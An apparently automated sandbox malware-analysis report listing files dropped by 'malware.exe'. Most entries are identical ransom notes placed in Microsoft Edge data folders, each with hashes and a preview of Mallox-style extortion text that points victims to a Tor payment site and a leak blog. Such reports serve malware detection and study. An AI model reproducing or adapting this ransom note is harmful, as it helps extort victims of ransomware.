                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
